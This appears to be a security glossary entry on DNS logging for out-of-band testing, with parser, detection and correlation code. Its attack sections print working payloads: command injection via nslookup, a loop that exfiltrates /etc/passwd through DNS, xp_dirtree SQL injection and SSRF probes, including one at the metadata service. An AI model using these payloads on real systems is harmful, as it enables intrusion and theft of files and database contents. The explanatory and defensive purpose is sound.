DNS Log
A record of Domain Name System queries and responses, showing what domain names were looked up, when, and by whom. Used in security testing to detect blind vulnerabilities.
Short Definition
DNS logs show which domain names were looked up. In security testing, you run your own DNS server and watch its logs. When the target server looks up your-unique-id.your-domain.com, that lookup appears in the logs, proving your exploit worked even if you can't see any direct output.
Full Definition
DNS logs are records of DNS resolution requests and responses, capturing queries made by systems when translating domain names to IP addresses.
What DNS logs contain:
- Query timestamp
- Source IP (who asked)
- Domain queried
- Query type (A, AAAA, TXT, etc.)
- Response given
- Response time
Example DNS log entry:
2026-02-26 10:30:45 | Source: 192.168.1.100 | Query: api.example.com | Type: A | Response: 93.184.216.34
In security testing:
Set up your own DNS logger:
your-domain.com → Your VPS/DNS server
During tests, use a unique subdomain:
test-abc123.your-domain.com
When the target looks it up, the log shows:
Query from 54.12.34.56 for test-abc123.your-domain.com
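To show what a DNS logger actually sees, here is an added example (not code from the original page or from any of the tools named on it) that builds a DNS query packet, parses the question section the way a logger must, and formats the same "timestamp | Source | Query | Type" log line used above. It assumes UDP payloads with one question per packet; the packet, IP and timestamp are constructed for the example.

```python
import struct

# Added illustration of the wire format a DNS logger decodes. Assumptions: UDP payloads,
# one question per packet; the sample packet is constructed, not captured traffic.

QTYPES = {1: "A", 28: "AAAA", 16: "TXT", 15: "MX", 5: "CNAME"}
MAX_LABEL = 63  # RFC 1035 label limit


def build_query(name, txid=0x1234, qtype=1):
    """Build a DNS query packet (header + one question) for `name`."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set; QDCOUNT=1
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", qtype, 1)  # QCLASS=IN


def parse_qname(packet, offset):
    """Read a dotted name starting at `offset`; returns (name, offset_after_name).

    Follows RFC 1035 compression pointers and rejects over-long labels."""
    labels = []
    end = None
    hops = 0
    while True:
        length = packet[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:  # 2-byte compression pointer
            if end is None:
                end = offset + 2
            offset = struct.unpack(">H", packet[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:  # guard against pointer loops in malformed packets
                raise ValueError("compression pointer loop")
            continue
        if length > MAX_LABEL:
            raise ValueError(f"label too long: {length}")
        offset += 1
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_query(packet):
    """Return (txid, qname, qtype_name) for the first question in `packet`."""
    if len(packet) < 12:
        raise ValueError("truncated header")
    txid, _flags, qdcount = struct.unpack(">HHH", packet[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    qname, offset = parse_qname(packet, 12)
    qtype, _qclass = struct.unpack(">HH", packet[offset:offset + 4])
    return txid, qname, QTYPES.get(qtype, str(qtype))


def log_entry(packet, source_ip, timestamp):
    """Format one query the way the log entries above are laid out.

    `source_ip` and `timestamp` are what the server's socket and clock provide."""
    _txid, qname, qtype = parse_query(packet)
    return f"{timestamp} | Source: {source_ip} | Query: {qname} | Type: {qtype}"


if __name__ == "__main__":
    # Constructed sample: the lookup a target would make for the unique test subdomain.
    packet = build_query("test-abc123.your-domain.com")
    print(log_entry(packet, "54.12.34.56", "2026-02-26 10:30:45"))
```

The parser rejects labels over 63 bytes and bounds pointer hops, because a logger on an Internet-facing port 53 receives malformed and hostile packets long before it receives the lookup you are waiting for.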
Popular tools:
- interactsh
- Burp Collaborator
- RequestBin
- Custom DNS servers (e.g. Python with dnslib)
Why It Matters
For security testing:
- Detects blind vulnerabilities without direct output
- Confirms exploitation in filtered environments
- Works when HTTP requests are blocked
- Bypasses WAF and filtering
- Exfiltrates data via subdomain encoding
For defenders:
- Detects data exfiltration attempts
- Identifies compromised systems
- Monitors for C2 communication
- Finds unauthorized external connections
How Attackers Use It (and Ethical Testing)
Blind SSRF confirmation:
# Test payload
POST /api/image-fetch
{"url": "http://ssrf-test-xyz.your-domain.com/image.jpg"}

# Check DNS logs on your server
$ tail -f /var/log/dns-queries.log
Query from 52.1.2.3: ssrf-test-xyz.your-domain.com
# SSRF confirmed! Server made DNS lookup
Data exfiltration via DNS:
# Blind command injection
; nslookup `whoami`.data.your-domain.com

# DNS log shows:
Query: root.data.your-domain.com
# Exfiltrated username: root
SQL Injection OOB:
-- Extract database name via DNS
'; DECLARE @db VARCHAR(100);
SELECT @db = DB_NAME();
EXEC('master..xp_dirtree "\\' + @db + '.sqli.your-domain.com\a"');--

# DNS log:
Query: production_db.sqli.your-domain.com
# Database name: production_db
Multiple query encoding:
# Exfiltrate sensitive file
file_contents=$(cat /etc/passwd | base64)
for chunk in $(echo $file_contents | fold -w 50); do
    nslookup $chunk.exfil.your-domain.com
done

# DNS logs receive file in chunks
Setting up DNS logger:
# Simple DNS logger
from dnslib import DNSRecord, RR, QTYPE, A
from dnslib.server import DNSServer
import logging

logging.basicConfig(level=logging.INFO)

class DNSLogger:
    def resolve(self, request, handler):
        reply = request.reply()
        qname = request.q.qname

        # Log the query
        logging.info(f"DNS Query: {qname} from {handler.client_address[0]}")

        # Return any IP (it doesn't matter for logging)
        reply.add_answer(RR(qname, QTYPE.A, rdata=A("1.2.3.4"), ttl=0))
        return reply

server = DNSServer(DNSLogger(), port=53, address="0.0.0.0")
server.start()
How to Detect or Prevent It
Prevention (Defensive):
Network controls:
# Block outbound DNS except to trusted servers
iptables -A OUTPUT -p udp --dport 53 -d 8.8.8.8 -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -j DROP
# DNS also runs over TCP (large answers, truncation fallback), so mirror the rules
iptables -A OUTPUT -p tcp --dport 53 -d 8.8.8.8 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 53 -j DROP

# Use DNS firewall
# Allow only corporate DNS servers
Monitor DNS patterns:
# Alert on suspicious patterns
import re
from collections import Counter

query_counts = Counter()  # queries seen per registered domain
KNOWN_OOB = ['burpcollaborator', 'interact.sh']

def alert(message):
    print(f"ALERT: {message}")

def contains_base64_or_hex(query):
    # A long run of hex digits or base64 characters in any label
    return any(re.fullmatch(r'[0-9a-fA-F]{16,}|[A-Za-z0-9+/=]{24,}', label)
               for label in query.split('.'))

def query_frequency(domain):
    query_counts[domain] += 1
    return query_counts[domain]

def analyze_dns_query(query):
    domain = '.'.join(query.rstrip('.').split('.')[-2:])  # registered domain, e.g. your-domain.com

    # Unusually long subdomain
    if len(query) > 100:
        alert("Possible data exfiltration via DNS")

    # Random-looking subdomain
    if contains_base64_or_hex(query):
        alert("Encoded data in DNS query")

    # Known OOB domains
    if any(pattern in query for pattern in KNOWN_OOB):
        alert("Known security testing domain")

    # Many queries to same unknown domain
    if query_frequency(domain) > 100:
        alert("Potential DNS tunneling")
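The rules above look at one query at a time. As an added example (not from the original page), the following applies them to whole log lines in the "timestamp | Source | Query | Type | Response" layout shown earlier, aggregates per registered domain, and decodes hex-looking labels so an analyst can see what was carried. The log lines, IPs and hostnames are constructed for the example; the threshold of 100 queries is the page's figure and is lowered in the demo only because the sample is tiny.

```python
import math
import re
from collections import Counter

# Added example: run the detection rules over a DNS log. All log lines below are
# constructed for the example; the IPs and hostnames are not real observations.

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \| Source: (?P<source>\S+) \| "
    r"Query: (?P<query>\S+) \| Type: (?P<qtype>\S+) \| Response: (?P<response>\S+)$"
)
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){8,}$", re.IGNORECASE)  # 16+ hex chars, even length
KNOWN_OOB = ("burpcollaborator", "interact.sh")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def shannon_entropy(text):
    """Bits per character; hostnames are usually ~2-3, encoded blobs ~4+."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def looks_encoded(label):
    """Hex run, or a long high-entropy label (base32/base64-style chunks)."""
    return bool(HEX_LABEL.match(label)) or (len(label) >= 20 and shannon_entropy(label) > 3.8)


def decode_hex_labels(qname):
    """Decode hex-looking labels so an analyst can see what they carried."""
    return [bytes.fromhex(l).decode("utf-8", "replace")
            for l in qname.split(".") if HEX_LABEL.match(l)]


def registered_domain(qname):
    """Last two labels; a naive stand-in for a public-suffix lookup (assumption)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze_log(lines, max_len=100, freq_threshold=100, known_oob=KNOWN_OOB):
    """Run the rules over a log; returns (rule, subject, detail) tuples."""
    alerts = []
    per_domain = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; count these separately in production
        q = rec["query"].rstrip(".")
        labels = q.split(".")
        per_domain[registered_domain(q)] += 1
        if len(q) > max_len:
            alerts.append(("long-query", rec["source"], q))
        if any(looks_encoded(l) for l in labels[:-2]):  # only the subdomain part
            alerts.append(("encoded-label", rec["source"], q))
        if any(p in q for p in known_oob):
            alerts.append(("known-oob-domain", rec["source"], q))
    for domain, count in per_domain.items():
        if count > freq_threshold:
            alerts.append(("high-frequency", domain, count))
    return alerts


LONG_LABEL = b"This is secret data, part two.".hex()  # 60 hex chars, under the 63-char label limit
SAMPLE_LOG = [
    "2026-02-26 10:30:45 | Source: 192.168.1.100 | Query: api.example.com | Type: A | Response: 93.184.216.34",
    "2026-02-26 10:30:46 | Source: 192.168.1.100 | Query: www.example.com | Type: A | Response: 93.184.216.34",
    "2026-02-26 10:31:02 | Source: 192.168.1.57 | Query: 54686973206973207365637265742064617461.exfil.attacker.com | Type: A | Response: NXDOMAIN",
    f"2026-02-26 10:31:03 | Source: 192.168.1.57 | Query: {LONG_LABEL}.{LONG_LABEL}.exfil.attacker.com | Type: A | Response: NXDOMAIN",
    "2026-02-26 10:31:04 | Source: 192.168.1.57 | Query: 4d6f7265207365637265742064617461.exfil.attacker.com | Type: A | Response: NXDOMAIN",
    "2026-02-26 10:32:10 | Source: 192.168.1.23 | Query: abc123.burpcollaborator.net | Type: A | Response: 1.2.3.4",
    "malformed line that the parser skips",
]

if __name__ == "__main__":
    # Threshold lowered to 2 because the sample is tiny; 100 is the figure used above.
    for alert in analyze_log(SAMPLE_LOG, freq_threshold=2):
        print(alert)
    print(decode_hex_labels("54686973206973207365637265742064617461.exfil.attacker.com"))
```

The frequency rule keys on the registered domain rather than the full name, since tunnelling traffic changes the subdomain on every query; the two-label cut is an assumption that breaks on suffixes such as co.uk, so a real deployment should use a public-suffix list.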
Detection (as tester, watching your logs):
Analyze what you see:
# Check logs
grep "Query:" /var/log/dns.log

# Look for patterns:
- Source IP = target system IP? (confirms it's coming from target)
- Timing matches your test? (confirms correlation)
- Subdomain format matches payload? (confirms it worked)
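Those three checks can be automated. As an added example (not from the original page), the following correlates logger lines in the "[timestamp] Query from <ip>: <name>" layout with a registry of which unique token was sent when. One caveat the code handles: the source IP in your logs is usually the target's recursive resolver, not the target itself, so an IP match is supporting evidence while the unique token arriving inside the test window is the real confirmation. The registry, log lines and IPs (documentation ranges) are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Added example: correlate DNS-logger lines with the tests that planted each unique
# subdomain. The registry, log lines and IPs below are constructed for the example.

LOG_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] Query from (?P<src>\S+): (?P<name>\S+)$")
TS_FMT = "%Y-%m-%d %H:%M:%S"

# Assumption: the tester records, per unique token, when it was sent and the target's
# egress IPs if known. An empty target_ips set just means "no IP evidence expected".
TESTS = {
    "ssrf-12345": {"sent": "2026-02-26 10:30:10", "target_ips": {"203.0.113.10"}},
    "ssrf-67890": {"sent": "2026-02-26 10:35:00", "target_ips": {"203.0.113.10"}},
    "ssrf-99999": {"sent": "2026-02-26 10:40:00", "target_ips": set()},
}

SAMPLE_LOG = [
    "[2026-02-26 10:30:12] Query from 203.0.113.10: ssrf-12345.your-domain.com",   # from the target itself
    "[2026-02-26 10:30:13] Query from 198.51.100.53: ssrf-12345.your-domain.com",  # the target's recursive resolver
    "[2026-02-26 11:05:40] Query from 192.0.2.77: ssrf-12345.your-domain.com",     # much later: replay, not proof
    "[2026-02-26 10:35:30] Query from 198.51.100.53: ssrf-67890.your-domain.com",  # resolver only, still in window
    "[2026-02-26 10:40:05] Query from 192.0.2.9: www.your-domain.com",             # unrelated noise
]


def parse_log_line(line):
    """Parse one logger line; returns a dict or None for lines in another format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], TS_FMT), "src": m["src"],
            "name": m["name"].rstrip(".").lower()}


def correlate(log_lines, tests, base_domain, window=timedelta(minutes=5)):
    """Group log hits by test token; returns ({token: [hit, ...]}, [unmatched records])."""
    hits = {token: [] for token in tests}
    unmatched = []
    suffix = "." + base_domain.lower()
    for line in log_lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        if not rec["name"].endswith(suffix):
            unmatched.append(rec)
            continue
        token = rec["name"][:-len(suffix)].split(".")[-1]  # label directly under the base domain
        test = tests.get(token)
        if test is None:
            unmatched.append(rec)
            continue
        delta = rec["ts"] - datetime.strptime(test["sent"], TS_FMT)
        hits[token].append({
            "ts": rec["ts"], "src": rec["src"],
            "from_target": rec["src"] in test["target_ips"],
            "in_window": timedelta(0) <= delta <= window,
        })
    return hits, unmatched


def verdict(token_hits):
    """'confirmed' needs a lookup inside the window; a matching source IP is a bonus,
    because most lookups arrive from the target's resolver rather than the target."""
    if not token_hits:
        return "none"
    if any(h["in_window"] for h in token_hits):
        return "confirmed"
    return "late-only"


if __name__ == "__main__":
    results, noise = correlate(SAMPLE_LOG, TESTS, "your-domain.com")
    for token, token_hits in results.items():
        print(token, verdict(token_hits),
              [(h["src"], h["from_target"], h["in_window"]) for h in token_hits])
    print("unmatched:", [r["name"] for r in noise])
```

A "late-only" result (the token seen, but only long after the test) usually means a crawler, a security scanner or a log-replay re-resolved the name; re-run the test with a fresh token before reporting.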
Automated monitoring:
# Alert on new queries
tail -f /var/log/dns.log | while read -r line; do
    echo "[$(date)] New DNS query detected!"
    echo "$line"
    # Send notification
done
Common Misconceptions
- "DNS logging requires special setup" - Query logging is a standard feature of most DNS servers
- "Can't exfiltrate much via DNS" - 255 chars per query name, and as many queries as needed
- "DNS queries are encrypted" - Usually plaintext (unless DoH/DoT)
- "Blocking HTTP blocks everything" - DNS often still allowed
- "DNS logs don't matter" - Critical for detecting blind exploits
Real-World Example
DNS Exfiltration in APT Attack
# Malware encoded stolen data in DNS queries
# Pattern seen in logs:

54686973206973207365637265742064617461.exfil.attacker.com
4d6f7265207365637265742064617461.exfil.attacker.com
...

# Hex decoded: "This is secret data"
# Exfiltrated gigabytes over weeks via DNS
Bug Bounty - Blind SSRF Discovery
# Target: E-commerce platform
# Feature: Fetch product image from URL

# Payload:
POST /admin/fetch-image
{"url": "http://ssrf-12345.researcher.com/image.jpg"}

# DNS log on researcher's VPS:
[2026-02-26 10:30:12] Query from 54.xxx.xxx.xxx: ssrf-12345.researcher.com

# Confirmed blind SSRF!
# Further testing with metadata service:
{"url": "http://169.254.169.254/"}

# If metadata accessible, DNS log would show:
# (Some implementations make DNS query first)
Blind SQLi via DNS
-- Real pentest scenario
-- Target: Healthcare application
-- Vulnerability: Blind SQL injection in search parameter

-- Payload:
search=test';
DECLARE @v VARCHAR(8000);
SET @v = (SELECT TOP 1 table_name FROM information_schema.tables);
EXEC('master..xp_dirtree "\\'+@v+'.sqli.tester.com\a"');--

# DNS log showed:
Query: patients.sqli.tester.com

-- Confirmed SQL injection
-- Exfiltrated table name: "patients"
-- Further queries extracted more sensitive info
Related Terms
DNS, Out-of-Band, Blind SSRF, VPS, Data Exfiltration